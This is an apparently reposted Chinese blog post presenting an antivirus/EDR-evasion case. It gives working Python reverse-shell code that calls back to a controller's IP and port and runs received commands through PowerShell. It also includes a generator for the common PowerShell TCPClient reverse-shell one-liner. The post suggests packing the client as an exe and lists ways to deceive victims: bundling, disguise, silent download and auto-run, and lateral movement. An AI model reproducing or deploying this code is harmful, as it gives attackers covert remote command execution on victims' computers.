python 实现nc功能 免杀案例-的确可以绕过奇安信,defender这些edr

这里仅用反弹powershell演示,大家可以发挥脑洞

(注:可以用pyinstaller转换为exe)

import os import time import socket ”’################”’ server_ip = ” # 更改为控制端的IP server_port = 13524 # 更改为控制端的第一PORT ”’################”’ mod = ”’powershell -nop -c “{0}””’ s = socket.socket() while True: try: s.connect((server_ip, server_port)) break except: time.sleep(3) while True: s.send(b'[Powershell:->’) cmd = s.recv(1024).decode() s.send(os.popen(mod.format(cmd)).read().encode()) s.close()

import sys server_ip = sys.argv[1] server_port_second = sys.argv[2] print(“服务端IP:”,server_ip,”\n服务端监听powershell端口:”,server_port_second) print(‘复制代码在nc中运行:’) print(”’$client = New-Object System.Net.Sockets.TCPClient(‘{0}’,{1});”’.format(str(server_ip),str(server_port_second)),end=”) print(”’$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”’)

这里不细讲,可以看看crow在B站的视频

  • 1. 捆绑软件
  • 2. 伪装软件
  • 3. 伪装并让受害者不知情地下载,然后悄咪咪的自动运行
  • 4. 渗透内网
  • *5. 调用漏洞

Original: https://www.cnblogs.com/bonelee/p/16540920.html
Author: bonelee
Title: python 实现nc功能 免杀案例-的确可以绕过奇安信,defender这些edr

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/6330/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

免费咨询
免费咨询
扫码关注
扫码关注
联系站长

站长Johngo!

大数据和算法重度研究者!

持续产出大数据、算法、LeetCode干货,以及业界好资源!

2022012703491714

微信来撩,免费咨询:xiaozhu_tec

分享本页
返回顶部